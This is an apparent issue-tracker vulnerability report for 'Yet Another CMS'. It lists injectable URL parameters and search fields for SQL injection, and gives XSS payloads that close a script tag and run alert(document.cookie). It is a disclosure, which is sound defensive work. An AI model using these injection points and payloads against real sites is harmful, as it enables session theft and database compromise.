This project is read-only.
1
Vote

SQL Injection & XSS vulnerabilities

description

Hi,
 
I've found some security vulnerabilities in the latest version of Yet Another CMS
 
SQL Injection
 
http://<target>/index.php?page=[sql injection]
http://<target>/search.php -> 'search field' -> [sql injection]
 
XSS
 
http://<target>/search.php -> 'search field' -> '"</script><script>alert(document.cookie)</script>
http://<target>/index.php?page='</script><script>alert(document.cookie)</script>
 
Best Regards,
sschurtz

file attachments

comments